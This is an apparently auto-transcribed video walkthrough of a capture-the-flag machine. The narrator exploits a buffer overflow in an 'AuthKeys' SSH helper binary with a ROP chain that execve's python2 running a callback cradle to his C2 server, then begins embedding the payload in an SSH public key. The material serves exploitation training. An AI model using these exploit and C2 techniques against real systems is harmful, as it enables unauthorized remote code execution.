SSH. Do I expect to run X Windows system? No, I do not. Username? No. Allow root login? Yes. What time zone? That's fine. Disk, whole. Let's see. Auto layout is fine. Let's install. Path name? Sure. It's a lot of hitting enters. Directory does not contain continue without verification? Yes. And now we're going to install BSD. So while this goes, I'm going to pause the video and we'll wait till this is done, which probably won't be long. So now it's asking me for location of sets. I'm just going to click done. Time appears wrong. I could care less. Let's just do all defaults. And it looks like it is going back to the install process. So let's pause the video again and I'll resume it next time it gives us input. So it looks like it's installed now. It wants me to exit shell, halt, or reboot. Let's reboot and see what happens. Congratulations, it is completed. So let's boot up. And hopefully once this goes in, we can just SSH in and be happy. Come on, BSD boot up. Starting network, we are 102. So I'm going to go over to parent and we will try SSH 192.168.1.102, was it? Looks like that's correct. Yes. Doesn't seem to like my password authentication. Root, password, ifconfig, and it is 102, so it doesn't want the password. Do we have Python 3? Python 2? pkj add Python 3. Can we add it? Looks like we can. So I'm going to put a SSH key on this machine and then transfer it over to my machine via a web server. So pkj add in BSD is how you install packages. It's like apt install. So installing Python. So we can go into .sh, SSH keygen, generating public private, sure, LSLA. chmod is already done. We can move idrsa.pub to authorized keys. And then I like to live dangerously, so let's just stand up a web server and give out IDRSA. So let's go over to parent, and we can wget 192.168.1.102 IDRSA. I'm going to curl this because I know how to specify the output, and I'll call this VM. Colon 8000. There we go. chmod 600 VM, SSH-I VM root at 192.168.1.102. There we go. Now we're root and a BSD machine we have. Awesome. So the next thing to do is copy AuthKeys over. So another web server, HTTP server. And what is this IP? This is 1.230. So wget 192.168.1.230. pkg add wget. Let's download it. And once it installs, wget 192.168.1.230 was it? 230, 8000 AuthKeys. chmod plus x, AuthKeys, and we are not segfaulting. So we have GDB AuthKeys, but GDB is a pain because I just like Geff so much more, Jeff, or whatever you pronounce it. I know it says it on the GitHub, but I haven't read it in a while of his preferred way to pronounce it. But it is a enhanced Python thing. Do we have eGDB? eGDB? We don't. So we have to install enhanced GDB first because GDB doesn't have Python scripting. So to install that, I wonder if we just do package add eGDB. And can't find it. GDB. Let's see if this installs the correct one. There we go. This is the enhanced one that will have Python scripting. So now we go to GDB GEF. And let's go to install. Install. And I know we just download a file. Let's see, check setup. This. It wants git clone. So I guess we should pkg add git. And then we can git clone this in. So just got to wait for git to install. Git clone, and then jeff.py. So ls jeff. Where's jeff.py? Oh, right there. So jeff.py. So I'm going to paste this, and we're going to go /root/jeff.py into gdb init. If I do eGDB, we get this, but we get a weird Unicode error. I think this is because of just all their coloring, and XCT had pointed out a way to get this error removed, and that is running export lc ctype is equal to c.utf-8. So now we can run eGDB, and we don't get that error message. So all is good in the world. Now let's get back over to IDA. Where were we? We wanted to look at something. So what do we want to do? See, we can look at what this moves. So we want to look at RDI right here. So I'm going to break on 400.352. And as soon as I move my mouse, it's going to go away. But if you look down in that little bar, it's gray. Right. Oh, no, it didn't move. Right here. This is where I get the address from. Alternatively, you can hit space and then look at the function you're on. But you can just go down there for a quick win. So 400.352. So I'm going to break *0x400. What was it? 432? 400.352. Okay. Run 1, 2, 3. And we're going to give it some base 64. So echo. Please subscribe, base64-W0. There we go. I'm going to put this in the last argument. We have to eGDB./AuthKeys. Let's go back to that break, run, and we can see exactly where we are. If we look at RDI, so if we go up here, we see RDI is this location, and that is pointed to all zeros right now. x/x. Yeah, so if we step let's see when that gets populated. I thought that would be our base 64. And sorry, let's see what it gets. It's not complete yet. He'll finish ASAP. So not exactly sure what is going here. So let's run this again. And we hit the breakpoint, and RDI is 0. So let's go and examine. Let's go 30. And see if we ever get to please subscribe. So this is all nulls. And I wonder if it's because it's expecting an SSH key. So let's go back to start. And right after this base 64, let's see what happens because, I don't know. Let's just see. So 400, 274. Break stir 0x 400, 274. Continue. Let's run. We can D1 to disable the breakpoint 1. So if I do info B, 1 is disabled, we go to 2. So let's see, run 1, 2, 3, 4. We hit 2. And let's see. RSI is still at evaluating. So I don't think we've printed that out yet. Let's see. Okay, so yeah. We have not printed that out. I think I wanted to go here. Let's go break on 400, 299. So B star 0x 400, 299. Continue. So let's see what RSP is right after that call. It's pointing to this, which is 5. So I'm not sure exactly what is going on here. But I'm bad at static analysis. So let's get away from that. And the great thing about Jeff is we have this pattern create. So we can create of 1024 bytes. Let's go 300 hex to decimal to see what that space is. 300 hex. 300 is 768. So based upon the base 64, I'm assuming that's what this is. Copying 300. We're going to see if we can put something bad there. So let's go pattern create 1024. That should greater than 300. And before we run this, it's going to unbase 64 it. So we just have to do echo-n and base 64-w0 to give it base 64. So I can copy this and do run 1, 2, 3 and paste this base 64 in. And we can see VOD is at RDX. So I can probably do a pattern search for that. And we see it's found at 768, but the stack pointer is what eventually gets over into RIP. So is there any string here? x/s. We do have a string here. So let's search or pattern search on this 776. So let's put 776 A's, and then we'll put 4 B's and see if we get RSP to be all B's. We continue. Info register. We don't even have registers. So let's go Python 3-c print A times what was it? 776 plus, we'll do B times 8 plus C times 8. Okay, and we want to base 64-W0 to encode this. Run 1, 2, 3, paste this in. And let's see what we have. RSP, so x/s right there, and we have the B's. So if we put something here, we could actually probably get this to execute that function. So if we go here, let's see. We just don't want it to segfault, right? So let's go and go to start. Wonder what happened if we put it to this function. So we want to put it to 3A9. So let's go back to our Python code. And then instead of these B's, let's put \x. And it was A90340. So A90340. Then we got the null byte, and then we got to do 4 more because this is 64-bit. So A90340, then 1, 2, 3, 4. That looks fine. And I'm going to just copy this to my clipboard, and we can run 1, 2, 3, and paste. And it still crashed. Let's see, x/xg, and we're going to do RSP. And it is set at the C's. 776. Let's get rid of these C's real quick and try this again. Maybe I screwed up somewhere. 1, 2, 3, paste, x/xg RSP. Let's see. Let's go back to the pattern create. And let's see, echo-n, base 64-d. Wait, that decoded? I don't see a decoding error. Weird. -W0. And then to the clipboard. R1, 2, 3, paste. Okay. And I'm going to set a breakpoint on this return. So 436b/xg. Oh, we can string it. RSP. What if I did like the wrong register last time? Pattern find, paste. It's pattern search. 776. 776. A90340. A90340. That should be right. So 1, 2, 3, paste. We're at the return. x/xg RSP. What? It's got 0403 A9 C2. I don't know where the C2 is coming from. If we decrement this by 1, it should get off that C2. So R1, 2, 3, paste this. And now we can see the return, and that's going to A9. So if I continue, bad number of arguments. So that's working as expected. I don't know why this is happening. So instead of base64ing, let's print this to xxd. And C2 is indeed there. But I'm just printing A's and then this, and it's adding C2, like this plus is becoming the C2. What is that? Man, ASCII C2. C2. I don't even know what character that is. Let's try byte encoding these. And now it's not doing hex. This is one of those things where I guess Python 2 is still the winner, because I don't think it's going to have this issue. So Python 2. Oh, wait. My Python defaults to 3. So specify Python 2. And we have 41A9. So yeah, when generating these one-liners, I guess use Python 2. Or check the comments and hopefully someone will find the correct way to do this. But we run this, and now we can successfully hit wrong number of arguments. And that is what we want. So we've performed the buffer overflow and jumped it to here, so we can prove we can jump somewhere in the program. So the next thing we have to do is create a ROP chain to get code execution of what we want. So let's clear our workspace and probably run Ropper against this binary to find some type of ROP chain that we can do in order to get code execution, because we know there are syscalls. So if we go to space, we do have like syscall that we can abuse. So if we can set all the registers we need, we can call this and potentially get like an Execve. So before we do Ropper, let's do Syscall table. I want to say Chromium is the one I like using. And we can also check like the BSD GitHub to find out the calling conventions are the same. Oddly enough, like this is a weird thing. Execve is the same. And I like this thing because it tells us what like the syscall number is. This is RAX. And then arg0, 1, 2. So it tells us all the registers, how to do this, and what belongs in them. Like this argv, this is RSI. So RSI is pointed to all the arguments of this. Now, if we do, let's see if I can find this quickly. OpenBSD syscall.h. Is that it? What is it going to say? Yeah, this is going to define all the syscalls. So we go down to 59. 59 is Execve, and in Chromium, 59 is this. 58 vfork fork clone, but we got readlink, symlink, revoke, and then after umask chroot get fs, exit, wait for, kill. And I think in syscall, 1 in BSD is exit. And at least on Linux, I think which Chromium follows, 1 is right. So I think this is why it was kind of running but failing, because the segfault would happen on the exit and it would set it to 1 and try to do a write, because that's what the syscall I think is on our Linux headers. But in BSD land, that 1 is sysexit. So that's probably why the binary was like half working, because some of the syscalls line up to be the same and the other ones don't. So at least talking through that solution issue, we figured it out. But we know we want to set EAX to be, or RAX to be 59. 3B is 59. Then the next register we want is the file name, this, and this. So what I'm going to do to make this easy is we're going to print the screen. Let's go Execve. Whoops, I do not want to do that yet. Execve. This will be, actually, yeah, let's just copy it. Go to Obsidian, create note, paste, and then go up here. I wish this table had some fancy JavaScript or something where we can get these arguments lined up as you scroll down. I think that's my biggest complaint about that. But now I can go over here and line it up. So RAX is going to be 3B, X 3B, RDI is file name, RSI is argv, and RDX is going to be an environment. So you have to get all these variables onto the correct thing. So that is when we do Ropper to try to find gadgets. So if we do Ropper, what is it? AuthKeys. I think we do -- file. And this prints like the gadget chain. And we can do -- search, pop RDI. Was that the first one? First one is RAX. So how do we get data into RAX? There's none. If we look at RDI, there's none. If we look at the next one, RSI, there's none. If we look at RDX, we do have a pop RDX. So RDX is poppable, but all the others are not. So we have to find different gadget chains to get data in there. And that's where this machine's like difficulty goes through the roof, because these gadgets are not easy to find. With the exception, of course, of this pop RDX that we're just going to record real quick. We can go to Obsidian, and yeah, these notes kind of went poorly, but oh well. Gadgets. Maybe I'll clean it up, maybe I won't. But this is a good gadget, pop RDX, and we have the memory address. So the next gadget we have is pretty cloaked. I'm just going to view everything. And if we go back to the syscalls of this, we want to get RAX. So what I'm going to do is search here for AX and see if we have anything. XOR, RAX, this is going to zero it out. So those aren't any good. But we do have this shift right. And shift right is a weird argument. So I'm going to log this as a potential gadget. And it'll make much more sense once you see it in action. There we go. So we got shift right. And even though it's EAX is part of RAX, so it'll do. And there's nothing really else there. There is this NOT AL, and this is hidden. If we go back to our register sheet that was here, we can see AL is actually part of EAX, which is part of RAX. And the NOT is going to take an inverse. So let's log that one. So if we go here and copy this. Okay. And this is going to be RAX. This, simply enough, will be, I think, RDX. Yeah, RDX. Okay. So, where are we? Yeah. So we want to explain this. And if we look at the assembly where we do this buffer overflow in the base 64, we're loading it here. And this is where the overflow happens. Actually, we load it right here. So we turn this into RSP and we copy more than we have. And it's going to zero out RAX, zero out RSI, zero out RDI, because it's copying a zeroed out RSI over RDI, popping RDX, and returning. And this is where we overwrote RSP. So this is the overflow right here. And it's zeroed out, so we know this is going to be nothing. We can confirm this real quick if we wanted to. Maybe. Let's go and set a breakpoint for here. So 400.36b. So 0x. Actually, I'm just going to close GDB, reload it. So we killed previous breakpoints. 400 and then 36b. And we're going to run our Python code again, which will crash it. R123, paste this. And we hit the breakpoint on this return. So if we look at our registers, we can see RAX is 0, RSI and RDI is 0 as well. And we can also take a look again at this string. Let's see what this is. This is 6010C0. I know we looked at this before, but I'm at a different point now. So let's break at 6010C0. 0x6010C0. And this looks better, actually. A is repeated 768 times. So this is the start of what we unbase 64. I'm not sure why we didn't get it before. Maybe when we did the pattern, we didn't give it base 64 and it was all zeros. I'm not sure what happened like 10 minutes ago, but no, it's good. Maybe we just broke at a different part of the program. It always sucks doing all this binx stuff live. But those are zeros. So we know RAX is 0, and we want to set it to 59 because 59 is the Chromium, or not the Chromium, but the Syscall for Execve. So we want to set it to that. And this is where it's going to get a little bit hard. So let's see. It's not really math. If you think about this as math, it puts you in a weird rabbit hole. It's more of just pattern recognition. So we're starting at, can I make this bigger? No. Oh well. So the start is going to be 1, 2, 3, 4, 1, 2, 3, 4. This is where we start. We do a NOT, and NOT is going to take the inverse. So it's doing spacing weird on this. Oh well. 1, 2, 3, 4, 1, 2, 3, 4. 1, 2, 3, 4, 1, 2, 3, 4. Yeah, I don't like this. I'm going to switch over to Notepad or something. So hold on a second. Okay, so here we are in Notepad++, and the characters are lining up. So this will make it easier. So we start at RAX to be all zeros. We can knot it to add ones. And then a shift right. If we do a shift right here, nothing happens because shift right moves everything to the right one. So it will take off the last bit and add a 0 here. So after this knot, if we did a shift right, it would go 0 and then the rest ones. So with this, we can build a string from left to right and get whatever value we want. So the target is going to be 59. So 59 will be, let's see, this bit is 128. 128 is greater than 59, so 0. The next bit is 64. 64 is greater than 59, so 0. Next is 32. 32 is less, so that's on. Then next is 16. So 16 plus 38 is 48. The next is 8. 8 plus 48 is going to be 56. 56 is still less than 59, so that's on. Then the next is 4. 56 plus 4 is 60. 60 is greater than 59, so that's off. Next is 2. 56 plus 2 is 58. 58 plus 1 is this. So this is going to be Execve 59. I don't know why I always capitalize that, but this is the syscall. So we want to build this string left to right. And it's going to seem unintuitive at first, because you'd think you'd have to do math and kind of figure out what all these calculate to get down to 59. But this is a game of patterns here. So we're going to shift right, and we're going to get this. And if we knotted this, this 1, or this 0 would turn into 1, which would be this bit. But we want to create 2 1s. So we're going to shift right again. So I'm going to do shift right, and it's going to do this. So now these 2 zeros, if we do a NOT, it's going to turn those 2 zeros into 1s, and we have successfully built these 2 bits. Now the next bit is a 0, so we're going to shift right, and now it becomes this, and we now have 3 bits. We're going to do the unintuitive thing and do a NOT here, which is going to make it not look like it's alike, but keep in mind we can invert this anytime we want. So it's not a big deal. So I'm going to do a NOT 1 0 0 all these ones, and now I can shift right, and that's going to do this. So if we did a NOT here, it would turn into this. So if we knotted this, it does this, and we have these bits. However, if we do shift right, it puts this at a 0, and we don't want these bits to be different. So we're not going to NOT. We're going to do another shift right, and it's going to do this, and then we're going to shift right yet again because we want 3 ones in a row. So we copy this, 0, like that. Keep in mind that last bit keeps going off. And now we are really close. So we want to, let's see, NOT it, I believe. Wait, yeah, NOT. So it doesn't look like we're close because nothing really matches up. But these 2 zeros, when we do this NOT, turn into these 1s. This turns into the 0. And these 3 zeros turn into these 3 1s. So we NOT it. And now it's looking really close to this. We just have to put 2 more zeros on it. So 2 shift rights. So it goes like this. There we go. And then 1 more shift right. And we have hit our target. 0 0 1 1 1. Yeah, we have 1 right here. So this is the math, or the complicated math of getting Execve, or getting RAX equal to 59 with just these 2 calls of NOT and shift right. So we can copy this, and then I'm going to go back into my VM, and we can get rid of the math and just put all those calls, because we're going to want that in a little bit. So that is that gadget chain. And the next gadget chain we have, we need to get, what is it? Going back to this, we have RAX, so we need RDI. And RDI, we don't have the gadget for. If we go back here, I know there's probably a Ropper command in GDB to do it, but if we look at this, and my memory is shot, RDI, search for DI, XORing out, so that's not good. Moving RSI into RDI, so if we have something for RSI, it could be good. XOR, again, move RSI into RDI. We have move ESI into EDI. We have these commands, which are interesting. And it's weird that Ropper is highlighting those. Generally, the commands Ropper highlights have some type of weird edge use case. So looking through all these, nothing really sticks out as super easy. So to do this one, we're going to need to use quite a few assembly instructions. Very first off, we have to use this movss, which is going to take RDX and put it into XMM1. And this is going to move a floating point number, so we have to keep in mind when we do a code. So this will be, what is it, RDI? So we have this gadget, and if you want to look, you can look at like movss assembly to see what it does. But it's going to move a merge scaling floating point number. So it just comes down to, it may make sense in just a second when we go over it. So this is going to move RDX into XMM0, which we don't want RDX, we want RDI. However, there is this pop RDX gadget. So in order to do it, we can pop RDX, and with RDX, we pop it with, what is it? The pointer or float pointer to RDI. So now when we go to this thing, we're moving RDX, which is just a pointer to RDI, into XMM0. So the next step here is to use yet another weird assembly function. And that is going to be, where is it? This one. We have XMM0. And we're going to move that into ESI and then return. So looking at this, and you can see exactly what this function is. Convert to a double word integer. So it's going to move XMM0 to ESI. And then after that, we have our final gadget, which is over here. We can move RSI into RDI. It's going to pop RDX, which doesn't really matter. We just have to know so we can align the stack, and then return. So let's see. I don't want to do this extra RSI, because if we use RSI, that will mess us up. So move RDI, RSI right here. So this instruction is, I guess, 3 bytes long, so 6.7. This is the one we want. The key piece of information, like in assembly, is you can break up at the opcodes anywhere. So even though it's saying this XOR, we can jump here. And the crazy thing is you can even go in middle of instructions. So even though there is no 365, we could go into 365 and make our own function if that's valid assembly. Like, I don't think this movss is actually in the assembly if we look through ITA. That is a function that is built to be vulnerable. And I'm seeing if I can find it real quick. I think it's part of these. So let's see. I think it's this weird like move statements of moving it in. I think we click on move. There we go, undefined. Is that going to do anything? Yes. So these are all the opcodes for move. If I go into 1 and we turn that into code, we now have movss. So again, move is really just hex for something. I don't know in ITA the hotkey anymore to undo it to view it, but we undefine, and we can see each of the like hex values for this, and we just go 1 in and we say now that is code, and we have now defined the CV2SI function. So again, it's just how functions work in assembly. So I think FFE8 is jump ESP. So if there was a function instead of FFE8, which equals jump ESP, if there was, let's say, AAFFE8, which equaled, I don't know, something, we can always say, well, this is going to be 1 byte. Let's say this is 2 bytes and this is 3 bytes. We can just say skip the very first byte of A to go straight to FF. And that's what we did with these two instructions, and that's what Ropper does. So hopefully that kind of helps illustrate ROP chains and how you can create arguments out of nothing. But it probably just confused people because I'm not good at explaining this stuff. At least in my head, I'm not. So we have, I think, all of the chains to do what we need. So we have RAX, we have RDI, and because we have RDI, and part of RDI is the next opcode, which was RSI, we have them all. Because for RDI, we do get ESI. We just don't do this last step. So we have all the instructions. So we can do RSI. So now it's building our exploit script. So let's go back to our Python. And we're going to build this in Python 3 and hope we don't have that weird error we did in Python 2. So let's do that. It will probably be easiest if we just start off with doing the EAX thing so you can see how that works, and then we'll go into all the memory management stuff after that. So let's build a proof of concept to set RAX to 59. And I may say RAX, EAX, I'm using them interchangeably. I don't know if it's correct, but oh well. So we're going to do buff is equal to nothing to initialize this. And then we got to create our junk. So a times 768, I think is what it was. If I do Python 2, 776, I think. So 776 vbuff 76. If this is wrong, then we'll just fix it. And then after this is where we have our ROP chain. So we have to define our gadgets. So we can define gadgets. And for this, I'm going to from pwn import stir. So I have pack 64-bit, which is a cool command. So let's go over here. And for RAX, we need two gadgets. We need this SHR. So this is the shift right. So SHR is equal to P64 that. And we want 0x. And then we want a NOT. And this is going to, gadget. I wonder if I can do, I guess I should not AL and shift right on EAX. And this can be equal to P64. And we can copy this. Naming conventions are horrible. So now we have those two. We know the buffer started at all zeros. So we want to do not AL, right? So if we go down, RAX, yeah. So not, and then we want to shift right twice. So buff plus equals shift right EAX. And we do that twice. Then we do the not. And then I think we shift right 3 times. And then we do a not. And then we shift right twice. And then do we do a not again? No. So let's go over this really quick. We start off with not, shift, shift, not, shift, not. So shift, not, then shift, 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 not, shift, shift. Okay, this hopefully is equal to 59, as long as we did it correctly, which you almost never do the first time. So I'm not going to be too upset if I did not. So what happens if we print buff now? Python 3 buff.py. It looks good. So we can encode this in base 64. So B64 string is equal to B64 encode, and then buff. And then I'm going to dot decode it so it's not a byte string. And we want to do from base 64 import B64 decode. And then I'm also going to import something I haven't used before in videos, is paperclip. And this is just going to allow us to copy stuff straight to a clipboard. So we can print B64 string, and we can also paperclip.copy, and we'll say B60, well, I can just do B64 string like that, right? I think so. So Python 3 buff, B64 encode. I'm not sure if I said encode or decode, but I typed decode. So now we have this. So let's see what happens when we run this. So run 1, 2, 3, paste. I don't know why I copied it, because Paperclip's putting it in my clipboard. So we can run this. And let's see. SI. So the first thing it's doing is that not AL. Oh, and then it does like ADC CL because they're not clean commands. So step I, and it hits this return, and we look at what was this RAX? RAX is now FF. And we shift right, return. Let's see. RAX, will that print? Print RAX, 7F. Shift, return, not, return, shift. So we're slowly building RAX. It's now at 27. Wonder what happens when it fails. I'm just going to continue, and we're probably going to crash, but RAX hopefully is 3B. And 3B, I think, is 59. Let's see. Hex 3B to decimal. 3B, 59. So we have now successfully set RAX. So now the leftover is to set the other parameters. So let's go back in here. We have to create gadgets. So here we can say setting RAX. And then the next one we want to set is going to be, let's go back here. We set that. So we want to set RDI. So let's go to our gadgets, how we did this. We need pop RDX. So in our gadgets, whoops, we're going to put pop RDX like that. And then the next gadget we wanted was this movss. So I'm going to copy this, movss XMM is equal to P64. This. Then we want the weird, this is RDX2. We want the weird this. And this puts it in ESI. I don't have a good way to do this naming. I'm sure I'll read the reps and be like, oh man, they name these gadgets so well. And then finally, we want RSI to RDI. So we can say move RDI RSI. And I'm also going to put pop RDX because we'll reuse that in a second. So copy this, put it here. And the reason why I said I'll use this pop RDX in a second, because the gadget chain to set ESI begins with pop RDX. So we don't have to make this gadget again for the next argument because we're already popping it from the previous one. So it's important to note that is a pop RDX as well. So we can add our gadget chain. So we can say setting, I always forget what argument it is. And I probably said it wrong a few times already, but this is going to be RDI. So setting RDI. And the very first piece of that was doing a pop RDX, which lets us put anything we want into this RDX value or register. And in order to do this next part, we have to start writing data. So we don't have anything to put into RDX. This is where something that OXDF had created for his blog post is going to come in handy. Again, like I said, we spent a long time yesterday, or the day before recording this video, going over this, so both my video and his blog post are top-notch. It was like a 4-hour Slack call, and then the day before was also multiple hours. And again, always helps talking with someone through these problems. So ignore the SSH headers piece right now. So all the data we're dealing with, the sending RDX, this is the ROP piece. So before that, this is the filler that's 776 bytes of stuff we can do. And the base address here at the very start, we know that. That base address is leaked. If we go to base 64, that is this guy, this base 64 value. Which is 6010C0. So we can say base address is equal to 0x6010C0. I hope that's what I said. So that memory address, 601, let's see, 6010C0, 6010C0. Yep. So we know the start of this is going to be here. And then we can just place a bunch of things on the stack, and then our ROP will start using that. So we got to put strings, and we put 3 different strings because of how we call the syscall. So if we go here and look at RSI for 59, I should go back to Obsidian, but it wants an array of arguments. And the arguments we want to do are going to be Python, which is the binary we want to execute, -c, which is the first argument, and then our Python code, which is going to be the, what is it? Like that web cradle we had built before. So we can't just use these plain strings as ROPs. We need memory pointers. So because we know this is always going to be 6010C0, we can calculate what address or what space all these are, and then we can write those pointers to the stack as well. So when we want to pull things from here, we can just say, okay, go to this address, which is going to point to this space that we wrote. So it's a really cool way of doing that. And then these as floats are going to be used for that movss command because it wants floating point values. And we just fill it with a bunch of blank space to get to where our overwrite is. So hopefully this kind of makes sense, and it'll make more sense as we go along. And I forgot to put a 0x right there. So let's see. The first thing we have to do is create our array right here. So let's create the array or list of execve args, and the very first one is going to be just user local bin python 2, and everything ends with a null byte. So the next one is going to be the -c, and then the final one, and my computer hung. There we go. That was weird. Hopefully, like, I'm not running out of disk space or something. Is going to be our Python shell. And we're going to pull this shell from our client. If we, let's see, go to a new pane. Let's cat vim.txt. And we can probably just run this. So I guess we can do it like this. Copy. And our Python shell is going to be that. Okay, so execve args are done. And wait, we just need a null byte. There we go. everything ends in null byte. So execve ergs. So now we have this, and if we just wrote this to the buffer, it would be hard to get all the pointers to everything. So I'm going to do a separate loop, and we're going to have this loop as addresses of execve ergs. And that's just going to be a blank list for now because we're going to populate it. So for argument in execve ergs. So for every item in this list, we're going to write the starting point. So addresses of execve ergs plus equals the length of the current buffer plus base address. And we should have buffer defined before this. There we go. So right now it's going to be 0 plus the base address is for the first one. And we can say buff plus equals argument. So the second one is going to go, and now the buffer is actually going to have data in it, so it's going to go to a different spot. So now this allows us to have the address of where every string is stored. So we just covered these three, actually four, because we have the null byte there as well. We don't, but we can just put buff plus equals, or we can shell, and I'm thinking of where to add the null byte. Doesn't really matter. I think that's good. So now we have a terminating to this whole array. So the next piece we have to do is going to be get this as a floating point. So buff plus equals arg, the null byte goes there. Okay, so this is build one-liner, I guess. And this next piece is going to be get floating point addresses. Okay, so now we need to get floating point addresses of two things, I believe. We need it for this Python 2, and then we need the start of this. Actually, shoot, I skipped a piece. So this is build one-liners, and this should be build argv, and we only put this stuff on stack. If we look buffer plus equals arg, we're not actually putting the addresses. So we only put these three things on stack. We need to, before we go into floating points, we need to build the pointers. So build pointers, or drop is bad. Write pointers should be good. So we can say for address in addresses of execve args, and we can then do buff plus equals, and we want to put this as a memory address like that. And then this isn't a null byte like this. This is P64 of nothing, which is null. There we go. So we have build argv, which is going to go and build these three strings and drop them to the buffer. And then we have write pointers, which is going to write these three pointers and drop it to the buffer, as well as the null. So the next piece is the floating point address, and we want to locate where we are in memory before we touch anything. So we're going to create the argument RDI pointer, because this very first one's going to be used for RDI, which is the address of Python as float. So this one is what we use in the pop command eventually, and it's just going to be pointed to this Python 2 variable. The next pointer is going to be for RSI, And RSI is going to be pointed to the args array. And it's smart enough to know to build this array like in memory and just terminate when there's a null byte. So it's going to be able to first go here, which is a pointer to this string, then the next one it pulls, then the third one it pulls. So this is going to be the argv array. So RDI pointer is equal to len buff plus base address. So that calculates where we are. So we can drop the, later when we pop it, we can use it. And we write the data of it. So buff plus equals struct.pack. And we need to import struct actually. So import struct. And you'd think parent tools would have an ability to do this, but I don't think it does. So struct.pack. And then this will convert to floating point. And we just do exec VE args, and we want this to be the addresses of exec VE args, and the very first one. And we can adjust it to be 8 bytes if we want. I don't think we have to. Yeah, we shouldn't have to do anything. So this should be good. So we grab the location of where we are before we write this address. So when we write it, this RDI pointer points to this memory address. So the next thing is RSI pointer, and you guessed it, we do the same thing, record where we are in memory. And this one is going to be, what is the location? We probably should have recorded where we were in memory just before this, because we need to get the memory location of right here. So we can say address of argv maybe, I don't know, is equal to the length of the buffer plus base address. So this one can be address argv. So the main issue we're probably going to run into is encoding. We probably have some things that are just not getting written well on stack. But now we have these two addresses. So we have to do our filler to get to where we set RAX. So here's all the gadgets. I'm going to move the gadgets up to near the top. Base address, gadgets. Probably be best to do these in multiple Python files. But we're no longer writing 776 A's. We're going to write 776 minus the length of buff. So if buff was 300, we're now going to write 476 A's to get us right back here. So let's see. Let's see if it works. There's no way this works. We're going to segfault right off the bat. The one thing I probably should do is change an IP address, but let's just see if we segfault. Python 3 buff.py. We don't even have valid code. 34. What is this? For address and I don't even know what I was typing there. I was talking and doing something and did not work out well. Oh, P64 question mark, question mark, question mark. We have to finish writing the ROP chain. So this is going to be a pointer to RDI. That is this guy. And then the next thing we want to do, buff plus equals the, what is it? I think movss. movss xmm. Then we want to do the next gadget, which will be, well, I'll copy these two. So buff plus equals this, and then this. So we set RDI, and I guess we can run this and see if it crashes before we do anything else. So Python 3, line 29, int and bytes. Wonder if I do base address not as p64. Let's see, address argv not defined. That's there. Oh, I have S. There we go. Pointer RDI not defined. RDI underscore pointer. Okay, we have copied it. So if we run 1, 2, 3 and paste, we hit a breakpoint. We're setting EAX right now. And we hit it again. Oh, we're doing the RDI stuff now. So if we look at our registers, RDI is equal to null right now. But if we step in, we do this return. Now this is setting ESI, return, moving RSI into RDI. And here we should be able to see what RDI is. RSI, RDI. And it looks like we're correct. This almost never happens. We look at that and we have the string. We're still going to segfault because we don't have the rest of the program done, but this is really good progress, and let's reset that breakpoint. So let's go into the buffer. So we have set RDI, and the next piece we want to do is set RSI. And RSI is going to be the arguments. And we don't have to do a pop RDX because we're doing pop RDX at the end of RDI. So all we have to do is write the memory address of our RSI pointer. So RSI underscore PTR. And then we do the movss. And this, which puts it in ESI, which is RSI. We don't have to do this final one because that was just moving it from ESI to RDI. So that is done. And then the final thing is we want to put a null byte in the last argument for RDI. And well, this is just a simple pop call. So buff plus equals pop RDX. I think we have that gadget. Right here, we do. So pop RDX, and we want to pop it with 0. So P64, 0. So that's going to null out RDI. We could also probably find a XOR RDI thing to like gadget, but we can just pop it with nothing. And the very final piece, we never wrote that gadget, is Syscall. So let's go back into Ropper, and we just want Syscall. It doesn't matter which one we return because this is Syscall, this is Syscall ret. They're at the same spot because the next argument is return. So we just want to get Syscall. So if I go back into buff, we can say gadget syscall is equal to p64 0x that, and then syscall buff plus equals syscall, right? Yep, there we go. So that should all work. Our web cradle right now isn't going to work because this is hard-coded for 10.10.14.2, which our box can't get to. So what I'm going to do, we can actually go into C2, v client, and we can change this to be our IP address, which IP of ETH0 1230. And the other piece is it's Python 3. Actually, we can test this, I think. We can just run it on the server. sh-i freshness at attended.htb. You let me in. Sweet. We called it test. Okay, 1, 2, 3. And let's see if this works before we go and edit it. Because my GDB or my BSD has Python 3, this has Python 2, and I hate changing a bunch of things if I don't have to. So Python 3 buff.py, that's in my clipboard now. Do we have a C2 running? We don't. So what I'm going to do is run it here. So cd c2 /c2 and sudo python 3 main.py. Paste this. Stuck out evaluating keys, do who am I? We get freshness. So we have successfully got code execution. And we can see here when I exited, we have the Python error message. So this is looking really good. Now the downside is on the attended gateway, we can't just execute this because we don't have any way to execute binaries. If we go back into AuthKeys, we can look at note.txt, and it's enabling AuthKeys for SSHD. And that's not done on attended, but if we etc ssh sshd config and search this for, let's see, authkey, we can see the authorized key command is using AuthKeys and then the 4 variables. So this is actually going to be the public key. So we just have to make this SSH thing into the public key. And this is where it's going to get a little bit confusing because I don't fully understand SSH. But this auth key, again, is ran when people try to log in via private key authentication. However, you don't need to build a private key. You can. It's just going to be more work because you build a private key, then replace the piece of the key with the exploit. You can just use public key. So how SSH works when you attempt to SSH into a server, you don't ever send the private key to the server. What you send them first is the public key to your private key, and you send it to the server, and you can send multiple public keys, and the server will be like, that public key works. Prove to me that you own that public key. So you sign something with the private key, send it back to the server, and the server goes, okay, that's good. But you don't ever have to send the private key to trigger this. We can just use the public key. So we got to convert our buff.py into a public key. There's no way that made sense, but I don't know of a good way to explain that. It makes sense in my head. So we're going to start off with building the public key header. So before we do this, let's look at the RFC, and I have my notes handy, which is RFC 4253. And let's see, once this loads, we can just search for SSH-RSA. And this is the format it begins in. It does string SSH RSA and then mprint. I don't know what this is exactly. I think it's precision print or something for E and N. And if you look at mprint's format, it's going to pretty much treat it like a serialized object in my head. So it's always got 4 bytes of length potential, and it's got 8 here, and that's going to be because this is 8 bytes in length, or maybe bits in length. It's been too long. So same one, we do mprint on 80, it's going to print 2 because 2 in length. Again, 1, 2, 3, 4 negative, EDCC, and then dead beef, DEAD beef, and that's 5 characters, or 5 bytes. So that's going to be the format of this. And SSH RSA is also done the same way. So in order to write our key, we're going to say buff plus equals P32, 7, and we want endian is equal to big, because that's how the format is. And 7 is because we want to put SSH-RSA. And this is 7 characters. 1, 2, 3, 4, 5, 6, 7. So we have successfully done the first like mprint or whatever it is. The next one we want to do is the E exponent, which is almost always going to be like 65,535, I think is the default for SSH. If you go back like a long time ago and like when we cracked RSA, yeah. And if you don't know, you can just go to an SSH key and look. So we're doing 01 or 10001. If we look at an SSH key, so let's just grab freshness.pub. And if you ever wondered why like all SSH keys begin with this AAB, because those are null bytes. I found that out doing this video. Echo-N, base64-D, XXD, less-S. So here we have the beginning, 7 bytes, and then SSH 